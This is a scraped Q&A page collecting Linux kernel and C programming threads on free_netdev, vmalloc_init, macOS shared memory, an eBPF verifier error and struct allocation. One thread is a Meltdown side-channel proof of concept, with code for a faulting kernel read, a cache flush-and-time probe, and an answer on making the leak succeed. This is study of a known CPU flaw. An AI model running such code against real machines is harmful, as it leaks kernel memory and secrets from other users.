not understand the mechanism of free_netdev

not understand the mechanism of free_netdev - linux-kernel

I study network-device-driver recently. But somehow not understand free_netdev this function.
I have read the following link:
Possible de-reference of private data using net_device
The answer says that when free the network device, the private data will also be free.
After checking this function, I found that it will call the following function:
void netdev_freemem(struct net_device *dev)
{
char *addr = (char *)dev - dev->padded;
kvfree(addr);
}
But I cannot understand why call this function will free all the net_device memory, and also the private data?
Or my understanding is wrong...
Just wondering if someone can guide me to understand the mechanism of free_netdev.
Thanks in advance.

Check out alloc_netdev() function definition in net/core/dev.c
alloc_size = sizeof(struct net_device);
if (sizeof_priv) {
/* ensure 32-byte alignment of private area */
alloc_size = ALIGN(alloc_size, NETDEV_ALIGN);
alloc_size += sizeof_priv;
}
/* ensure 32-byte alignment of whole construct */
alloc_size += NETDEV_ALIGN - 1;
p = kzalloc(alloc_size, GFP_KERNEL | __GFP_NOWARN | __GFP_REPEAT);
if (!p)
p = vzalloc(alloc_size);
if (!p)
return NULL;
dev = PTR_ALIGN(p, NETDEV_ALIGN);
dev->padded = (char *)dev - (char *)p;
It does a Kzalloc of sizeof(struct net_device) + sizeof_priv + padding_bytes.
So net_device private is memory immediately following struct net_device and hence kfree() of netdev frees even net_device_private memory.

Thanks #Nithin
After checking code of alloc_netdev_mqs, I think it will be clear to draw a diagram to answer my own question. So from the diagram, we can see (char *)dev - dev->padded is just want to find the p's location, And free this p variable will just free all the allocated memory.
------------------- [p = kzalloc(alloc_size, GFP_KERNEL)]
------------------- [dev = PTR_ALIGN(p, NETDEV_ALIGN)]
since p may not aligned to NETDEV_ALIGN * n
and the final added NETDEV_ALIGN - 1 is for the space
of dev - p
------------------- [size of net_device struct]
------------------- [do the size alignment of net_device struct]
------------------- [private data]
------------------- [add final NETDEV_ALIGN - 1 for padding]

Related

for_each_possible_cpu macro in vmalloc_init() function, does the code run in only one cpu? or in every cpu?

this is not about programming, but I ask it here..
in linux start_kernel() function, in the mm_init() function, I see vmalloc_init() function.
inside the function I see codes like this.
void __init vmalloc_init(void)
{
struct vmap_area *va;
struct vm_struct *tmp;
int i;
/*
* Create the cache for vmap_area objects.
*/
vmap_area_cachep = KMEM_CACHE(vmap_area, SLAB_PANIC);
for_each_possible_cpu(i) {
struct vmap_block_queue *vbq;
struct vfree_deferred *p;
vbq = &per_cpu(vmap_block_queue, i);
spin_lock_init(&vbq->lock);
INIT_LIST_HEAD(&vbq->free);
p = &per_cpu(vfree_deferred, i);
init_llist_head(&p->list);
INIT_WORK(&p->wq, free_work);
}
/* Import existing vmlist entries. */
for (tmp = vmlist; tmp; tmp = tmp->next) {
va = kmem_cache_zalloc(vmap_area_cachep, GFP_NOWAIT);
if (WARN_ON_ONCE(!va))
continue;
va->va_start = (unsigned long)tmp->addr;
va->va_end = va->va_start + tmp->size;
va->vm = tmp;
insert_vmap_area(va, &vmap_area_root, &vmap_area_list);
}
/*
* Now we can initialize a free vmap space.
*/
vmap_init_free_space();
vmap_initialized = true;
}
I'm not sure if this code is run on every cpu(core) or just on the first cpu?
if this code runs on every smp core, how is this code inside for_each_possible_cpu loop run?
The smp setup seems to be done before this function.

start_kernel() calls mm_init() which calls vmalloc_init(). Only the first (boot) CPU is active at that point. Later, start_kernel() calls arch_call_rest_init() which calls rest_init().
rest_init() creates a kernel thread for the init task with entry point kernel_init(). kernel_init() calls kernel_init_freeable(). kernel_init_freeable() eventually calls smp_init() to activate the remaining CPUs.

Every macro in for_each_cpu family is just wrapper for for() loop, where iterator is a CPU index.
E.g., the core macro of this family is defined as
#define for_each_cpu(cpu, mask) \
for ((cpu) = -1; \
(cpu) = cpumask_next((cpu), (mask)), \
(cpu) < nr_cpu_ids;)
Each macro in for_each_cpu family uses its own CPUs mask, which is just a set of bits corresponded to CPU indices. E.g. mask for for_each_possible_cpu macro have bits set for every index of CPU which could ever be enabled in current machine session.

MacOS shm - Unable to get true data size in shm

When performing shm-related development on MacOS, the searched processes are shown in the following code (verification is indeed correct).
However, there is a new problem that cannot be solved. It is found that when ftruncat adjusts the memory size for shm_fd, it is allocated according to the multiple of the page size.
But in this case, when the shared memory file is opened by other processes, the actual data size cannot be obtained correctly. The obtained file size is an integer multiple of the page, which will cause an error when appending data.
// write data_size = 12
char *data = "....";
long data_size = 12;
shmFD = shm_open(...);
ftruncate(shmFD, data_size); // Actually the size actually allocated is not 12, but 4096
shmAddr = (char *)mmap(NULL, data_size, ... , shmFD, 0);
memcpy(shmAddr, data, data_size);
// read
...
fstat(shmFD, &sb)
long context_len_in_shm = sb.st_size;
// get wrong shm size -> context_len_in_shm = 4096

Temporarily use the following structure to record data into shm. The first operation before writing or reading is to get the value of the data_len field, and then determine the length of the data to be read and written from the back. Hope for a more concise way, just like the use of lseek() under Linux.
shm mem map :
----shm mem----
struct {
long data_len;
data[1];
data[2];
...
data[data_len];
}
---------------
long *shm_mem = (long *)shmAddr;
long data_size = shm_mem[0]; // Before reading, you need to determine whether the shm file is empty and whether the pointer is valid. It is omitted here.
char *shm_data = (char *)&(shm_mem[1]);
char *buffer = (char *)malloc(data_size);
memcpy(buffer, shm_data, data_size);

Encouraging the CPU to perform out of order execution for a Meltdown test

I am attempting to exploit the meltdown security flaw on Ubuntu 16.04, with an unpatched kernel 4.8.0-36 on an Intel Core-i5 4300M CPU.
First, I am storing the secret data at an address in kernel space using a kernel module :
static __init int initialize_proc(void){
char* key_val = "abcd";
printk("Secret data address = %p\n", key_val);
printk("Value at %p = %s\n", key_val, key_val);
}
The printk statement gives me the address of the secret data.
Mar 30 07:00:49 VM kernel: [62055.121882] Secret data address = fa2ef024
Mar 30 07:00:49 VM kernel: [62055.121883] Value at fa2ef024 = abcd
I then attempt to access the data at this location and in the next instruction use it to cache an element of an array.
// Out of order execution
int meltdown(unsigned long kernel_addr){
char data = *(char*) kernel_addr; //Raises exception
array[data*4096+DELTA] += 10; // <----- Execute out of order
}
I am expecting the CPU to go ahead and cache the array element at index (data*4096 +DELTA) when performing out of order execution. After this, a bounds check is performed and SIGSEGV is thrown.
I handle the SIGSEGV and then time the access to the array elements to determine which one has been cached:
void attackChannel_x86(){
register uint64_t time1, time2;
volatile uint8_t *addr;
int min = 10000;
int temp, i, k;
for(i=0;i<256;i++){
time1 = __rdtscp(&temp); //timestamp before memory access
temp = array[i*4096 + DELTA];
time2 = __rdtscp(&temp) - time1; // change in timestamp after the access
if(time2<=min){
min = time2;
k=i;
}
}
printf("array[%d*4096+DELTA]\n", k);
}
Since the value in data is ‘a’, I am expecting the result to be array[97*4096 + DELTA] since ASCII value of ‘a’ is 97.
However, this is not working and I am getting random outputs.
~/.../MyImpl$ ./OutofOrderExecution
Memory Access Violation
array[241*4096+DELTA]
~/.../MyImpl$ ./OutofOrderExecution
Memory Access Violation
array[78*4096+DELTA]
~/.../MyImpl$ ./OutofOrderExecution
Memory Access Violation
array[146*4096+DELTA]
~/.../MyImpl$ ./OutofOrderExecution
Memory Access Violation
array[115*4096+DELTA]
The possible reasons I could think of are:
The instruction caching the array element is not getting executed
out of order.
Out of order execution is occurring but the cache is being flushed.
I have misunderstood the mapping of memory in the kernel module and the address I'm using is incorrect
Since the system is vulnerable to meltdown, I am certain that rules out the 2nd possibility.
Hence, my question is: Why is out of order execution not working here? Are there any options/flags that “encourage” the CPU to execute out of order ?
Solutions I’ve already tried:
Using clock_gettime instead of rdtscp for timing memory access.
void attackChannel(){
int i, k, temp;
uint64_t diff;
volatile uint8_t *addr;
double min = 10000000;
struct timespec start, end;
for(i=0;i<256;i++){
addr = &array[i*4096 + DELTA];
clock_gettime(CLOCK_MONOTONIC, &start);
temp = *addr;
clock_gettime(CLOCK_MONOTONIC, &end);
diff = end.tv_nsec - start.tv_nsec;
if(diff<=min){
min = diff;
k=i;
}
}
if(min<600)
printf("Accessed element : array[%d*4096+DELTA]\n", k);
}
Keeping the arithmetic units “busy” by executing a loop (see meltdown_busy_loop)
void meltdown_busy_loop(unsigned long kernel_addr){
char kernel_data;
asm volatile(
".rept 1000;"
"add $0x01, %%eax;"
".endr;"
:
:
:"eax"
);
kernel_data = *(char*)kernel_addr;
array[kernel_data*4096 + DELTA] +=10;
}
Using procfs to force the data into the cache before performing a time attack (see meltdown)
int meltdown(unsigned long kernel_addr){
// Cache the data to improve success
int fd = open("/proc/my_secret_key", O_RDONLY);
if(fd<0){
perror("open");
return -1;
}
int ret = pread(fd, NULL, 0, 0); //Data is cached
char data = *(char*) kernel_addr; //Raises exception
array[data*4096+DELTA] += 10; // <----- Out of order
}
For anyone interested in setting it up, here is the link to the github repo
For the sake of completeness, I am appending the main function and error handling code below:
void flushChannel(){
int i;
for(i=0;i<256;i++) array[i*4096 + DELTA] = 1;
for(i=0;i<256;i++) _mm_clflush(&array[i*4096 + DELTA]);
}
void catch_segv(){
siglongjmp(jbuf, 1);
}
int main(){
unsigned long kernel_addr = 0xfa2ef024;
signal(SIGSEGV, catch_segv);
if(sigsetjmp(jbuf, 1)==0)
{
// meltdown(kernel_addr);
meltdown_busy_loop(kernel_addr);
}
else{
printf("Memory Access Violation\n");
}
attackChannel_x86();
}

I think the data needs to be in L1d for Meltdown to work, and attempting to read it only through a TLB / page-table entry that doesn't have privileges won't bring it into L1d.
http://blog.stuffedcow.net/2018/05/meltdown-microarchitecture/
When any kind of bad outcome occurs (page fault, load from a non-speculative memory type, page accessed bit = 0), none of the processors initiate an off-core L2 request to fetch the data.
Unless there's something I'm missing, I think data is only vulnerable to Meltdown when something that is allowed to read it has brought it into L1d. (Directly or via HW prefetch.) I don't think repeated Meltdown attacks can bring data from RAM into L1d.
Try adding a system call or something to your module that uses READ_ONCE() on your secret data (or manually write *(volatile int*)&data; or just make it volatile so you can easily touch it) to bring it into cache from a context that does have privileges for that PTE.
Also: add $0x01, %%eax is a poor choice for delaying retirement. It's only 1 clock cycle of delay per uop, so OoO exec only has ~64 cycles from when the first instruction after the ADDs can enter the scheduler (RS) and run, before it chews through the adds and the faulting loads reach retirement.
At least use imul (3c latency), or better use xorps %xmm0,%xmm0 / repeated sqrtpd %xmm0,%xmm0 (single uop, 16 cycle latency on your Haswell.) https://agner.org/optimize/.

How to solve the "R0 invalid mem access 'inv'" error when loading an eBPF file object

I'm trying to load an eBPF object in the kernel with libbpf, with no success, getting the error specified in the title. But let me show how simple my BPF *_kern.c is.
SEC("entry_point_prog")
int entry_point(struct xdp_md *ctx)
{
int act = XDP_DROP;
int rc, i = 0;
struct global_vars *globals;
struct ip_addr addr = {};
struct some_key key = {};
void *temp;
globals = bpf_map_lookup_elem(&globals_map, &i);
if (!globals)
return XDP_ABORTED;
rc = some_inlined_func(ctx, &key);
addr = key.dst_ip;
temp = bpf_map_lookup_elem(&some_map, &addr);
switch(rc)
{
case 0:
if(temp)
{
// no rocket science here ...
} else
act = XDP_PASS;
break;
default:
break;
}
return act; // this gives the error
//return XDP_<whatever>; // this works fine
}
More precisely, the libbpf error log is the following:
105: (bf) r4 = r0
106: (07) r4 += 8
107: (b7) r8 = 1
108: (2d) if r4 > r3 goto pc+4
R0=inv40 R1=inv0 R2=inv(id=0,umax_value=4294967295,var_off=(0x0; 0xffffffff)) R3=pkt_end(id=0,off=0,imm=0) R4=inv48 R5=inv512 R6=inv1 R7=inv17 R8=inv1 R10=fp0,call_-1 fp-16=0 fp-32=0 fp-40=0
109: (69) r3 = *(u16 *)(r0 +2)
R0 invalid mem access 'inv'
I really don't see any problem here. I mean, this is so so simple, and yet it breaks. Why shouldn't this work? What am I missing? Either the verifier went crazy, or I'm doing something very stupid.

Ok, so, after 3 days, more precisely 3 x 8 hrs = 24 hrs, worth of code hunting, I think I've finally found the itching problem.
The problem was in the some_inlined_func() all along, it was more tricky then challenging. I'm writing down here a code template explaining the issue, so others could see and hopefully spend less then 24 hrs of headache; I went through hell for this, so stay focused.
__alwais_inline static
int some_inlined_func(struct xdp_md *ctx, /* other non important args */)
{
if (!ctx)
return AN_ERROR_CODE;
void *data = (void *)(long)ctx->data;
void *data_end = (void *)(long)ctx->data_end;
struct ethhdr *eth;
struct iphdr *ipv4_hdr = NULL;
struct ipv6hdr *ipv6_hdr = NULL;
struct udphdr *udph;
uint16_t ethertype;
eth = (struct ethhdr *)data;
if (eth + 1 > data_end)
return AN_ERROR_CODE;
ethertype = __constant_ntohs(eth->h_proto);
if (ethertype == ETH_P_IP)
{
ipv4_hdr = (void *)eth + ETH_HLEN;
if (ipv4_hdr + 1 > data_end)
return AN_ERROR_CODE;
// stuff non related to the issue ...
} else if (ethertype == ETH_P_IPV6)
{
ipv6_hdr = (void *)eth + ETH_HLEN;
if (ipv6_hdr + 1 > data_end)
return AN_ERROR_CODE;
// stuff non related to the issue ...
} else
return A_RET_CODE_1;
/* here's the problem, but ... */
udph = (ipv4_hdr) ? ((void *)ipv4_hdr + sizeof(*ipv4_hdr)) :
((void *)ipv6_hdr + sizeof(*ipv6_hdr));
if (udph + 1 > data_end)
return AN_ERROR_CODE;
/* it actually breaks HERE, when dereferencing 'udph' */
uint16_t dst_port = __constant_ntohs(udph->dest);
// blablabla other stuff here unrelated to the problem ...
return A_RET_CODE_2;
}
So, why it breaks at that point? I think it's because the verifier assumes ipv6_hdr could potentially be NULL, which is utterly WRONG because if the execution ever gets to that point, that's only because either ipv4_hdr or ipv6_hdr has been set (i.e. the execution dies before this point if it's the case of neither IPv4 nor IPv6). So, apparently, the verifier isn't able to infer that. However, there's a catch, it is happy if the validity of also ipv6_hdr is explicitly checked, like this:
if (ipv4_hdr)
udph = (void *)ipv4_hdr + sizeof(*ipv4_hdr);
else if (ipv6_hdr)
udph = (void *)ipv6_hdr + sizeof(*ipv6_hdr);
else return A_RET_CODE_1; // this is redundant
It also works if we do this:
// "(ethertype == ETH_P_IP)" instead of "(ipv4_hdr)"
udph = (ethertype == ETH_P_IP) ? ((void *)ipv4_hdr + sizeof(*ipv4_hdr)) :
((void *)ipv6_hdr + sizeof(*ipv6_hdr));
So, it seems to me there's something strange about the verifier here, because it's not smart enough (maybe neither it needs to be?) to realize that if it ever gets to this point, it's only because ctx refers either an IPv4 or IPv6 packet.
How does all of this explain the complaining over return act; within the entry_point()? Simple, just bear with me. The some_inlined_func() isn't changing ctx, and its remaining args aren't used either by entry_point(). Thus, in case of returning act, as it depends on the some_inlined_func() outcome, the some_inlined_func() gets executed, with the verifier complaining at that point. But, in case of returning XDP_<whatever>, as the switch-case body, and neither the some_inlined_func(), doesn't change the internal state of the entry_point() program/function, the compiler (with O2) is smart enough to realize that there's no point in producing assembly for some_inlined_func() and the whole switch-case (that's the O2 optimization over here). Therefore, to conclude, in case of returning XDP_<whatever>, the verifier was happy as the problem actually lies into some_inlined_func() but the actual produced BPF assembly doesn't have anything of that, so the verifier didn't checked some_inlined_func() because there wasn't any in the first place. Makes sense?
Is such BPF "limitation" known? Is out there any document at all stating such known limitations? Because I didn't found any.

how do I allocate memory for some of the structure elements

I want to allocate memory for some elements of a structure, which are pointers to other small structs.How do I allocate and de-allocate memory in best way?
Ex:
typedef struct _SOME_STRUCT {
PDATATYPE1 PDatatype1;
PDATATYPE2 PDatatype2;
PDATATYPE3 PDatatype3;
.......
PDATATYPE12 PDatatype12;
} SOME_STRUCT, *PSOME_STRUCT;
I want to allocate memory for PDatatype1,3,4,6,7,9,11.Can I allocate memory with single malloc? or what is the best way to allocate memory for only these elements and how to free the whole memory allocated?

There is a trick that allows a single malloc, but that also has to weighed against doing a more standard multiple malloc approach.
If [and only if], once the DatatypeN elements of SOME_STRUCT are allocated, they do not need to be reallocated in any way, nor does any other code do a free on any of them, you can do the following [the assumption that PDATATYPEn points to DATATYPEn]:
PSOME_STRUCT
alloc_some_struct(void)
{
size_t siz;
void *vptr;
PSOME_STRUCT sptr;
// NOTE: this optimizes down to a single assignment
siz = 0;
siz += sizeof(DATATYPE1);
siz += sizeof(DATATYPE2);
siz += sizeof(DATATYPE3);
...
siz += sizeof(DATATYPE12);
sptr = malloc(sizeof(SOME_STRUCT) + siz);
vptr = sptr;
vptr += sizeof(SOME_STRUCT);
sptr->Pdatatype1 = vptr;
// either initialize the struct pointed to by sptr->Pdatatype1 here or
// caller should do it -- likewise for the others ...
vptr += sizeof(DATATYPE1);
sptr->Pdatatype2 = vptr;
vptr += sizeof(DATATYPE2);
sptr->Pdatatype3 = vptr;
vptr += sizeof(DATATYPE3);
...
sptr->Pdatatype12 = vptr;
vptr += sizeof(DATATYPE12);
return sptr;
}
Then, the when you're done, just do free(sptr).
The sizeof above should be sufficient to provide proper alignment for the sub-structs. If not, you'll have to replace them with a macro (e.g. SIZEOF) that provides the necessary alignment. (e.g.) for 8 byte alignment, something like:
#define SIZEOF(_siz) (((_siz) + 7) & ~0x07)
Note: While it is possible to do all this, and it is more common for things like variable length string structs like:
struct mystring {
int my_strlen;
char my_strbuf[0];
};
struct mystring {
int my_strlen;
char *my_strbuf;
};
It is debatable whether it's worth the [potential] fragility (i.e. somebody forgets and does the realloc/free on the individual elements). The cleaner way would be to embed the actual structs rather than the pointers to them if the single malloc is a high priority for you.
Otherwise, just do the the [more] standard way and do the 12 individual malloc calls and, later, the 12 free calls.
Still, it is a viable technique, particularly on small memory constrained systems.
Here is the [more] usual way involving per-element allocations:
PSOME_STRUCT
alloc_some_struct(void)
{
void *vptr;
PSOME_STRUCT sptr;
sptr = malloc(sizeof(SOME_STRUCT));
// either initialize the struct pointed to by sptr->Pdatatype1 here or
// caller should do it -- likewise for the others ...
sptr->Pdatatype1 = malloc(sizeof(DATATYPE1));
sptr->Pdatatype2 = malloc(sizeof(DATATYPE2));
sptr->Pdatatype3 = malloc(sizeof(DATATYPE3));
...
sptr->Pdatatype12 = malloc(sizeof(DATATYPE12));
return sptr;
}
void
free_some_struct(PSOME_STRUCT sptr)
{
free(sptr->Pdatatype1);
free(sptr->Pdatatype2);
free(sptr->Pdatatype3);
...
free(sptr->Pdatatype12);
free(sptr);
}

If your structure contains the others structures as elements instead of pointers, you can allocate memory for the combined structure in one shot:
typedef struct _SOME_STRUCT {
DATATYPE1 Datatype1;
DATATYPE2 Datatype2;
DATATYPE3 Datatype3;
.......
DATATYPE12 Datatype12;
} SOME_STRUCT, *PSOME_STRUCT;
PSOME_STRUCT p = (PSOME_STRUCT)malloc(sizeof(SOME_STRUCT));
// Or without malloc:
PSOME_STRUCT p = new SOME_STRUCT();

Develop Reference

ruby bash windows laravel spring algorithm oracle macos go visual-studio

not understand the mechanism of free_netdev - linux-kernel

Related

for_each_possible_cpu macro in vmalloc_init() function, does the code run in only one cpu? or in every cpu?

MacOS shm - Unable to get true data size in shm

Encouraging the CPU to perform out of order execution for a Meltdown test

How to solve the "R0 invalid mem access 'inv'" error when loading an eBPF file object

how do I allocate memory for some of the structure elements

Categories

Resources